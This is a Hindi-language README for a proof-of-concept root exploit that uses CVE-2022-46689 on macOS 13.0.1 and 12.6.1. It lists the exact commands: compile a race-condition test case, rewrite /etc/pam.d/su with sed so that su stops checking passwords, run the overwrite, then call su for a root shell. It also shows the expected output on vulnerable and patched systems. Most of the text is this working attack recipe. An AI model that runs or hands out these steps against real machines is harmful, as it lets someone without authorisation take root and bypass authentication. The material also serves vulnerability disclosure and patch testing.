
macOS 13.0.1 पर CVE-2022-46689 (Dirty Cow बग का macOS समतुल्य) का उपयोग करके रूट प्राप्त करें, Apple के XNU स्रोत से निकाले गए टेस्टकेस का उपयोग करके।
macOS 13.0.1 पर CVE-2022-46689 (डर्टी काउ बग का macOS समतुल्य) का उपयोग करके रूट प्राप्त करें, Apple के XNU स्रोत से निकाले गए टेस्टकेस का उपयोग करके।
https://worthdoingbadly.com/macdirtycow/
macOS 13.0.1 / 12.6.1 (या उससे नीचे) मशीन पर, निम्न चलाएँ:
clang -o switcharoo vm_unaligned_copy_switch_race.c
sed -e "s/rootok/permit/g" /etc/pam.d/su > overwrite_file.bin
./switcharoo /etc/pam.d/su overwrite_file.bin
su
आपको यह मिलना चाहिए:
% ./switcharoo /etc/pam.d/su overwrite_file.bin
Testing for 10 seconds...
RO mapping was modified
% su
sh-3.2#
SIP बंद होने पर macOS 13 beta (22A5266r) पर परीक्षण किया गया (यह SIP चालू होने पर भी काम करेगा)।
यदि आपका सिस्टम पूरी तरह से पैच किया गया है (macOS 13.1 / 12.6.2), तो इसे इसके बजाय पढ़ना चाहिए:
$ ./switcharoo /etc/pam.d/su overwrite_file.bin
Testing for 10 seconds...
vm_read_overwrite: KERN_SUCCESS:9865 KERN_PROTECTION_FAILURE:3840 other:0
Ran 13705 times in 10 seconds with no failure
और su चलाने पर अभी भी पासवर्ड माँगना चाहिए।
सील्ड सिस्टम वॉल्यूम के लिए धन्यवाद, /System वॉल्यूम पर किसी भी फ़ाइल पर इसे चलाने से फ़ाइल केवल अस्थायी रूप से संशोधित होती है: यह रीबूट पर रीवर्ट हो जाती है। इसे लिखने योग्य वॉल्यूम पर किसी फ़ाइल पर चलाने से संशोधन रीबूट के बाद भी संरक्षित होता है।
/etc/pam.d का उपयोग करके पासवर्ड चेकिंग को अक्षम करने की तरकीब के लिए SSLab@Gatech।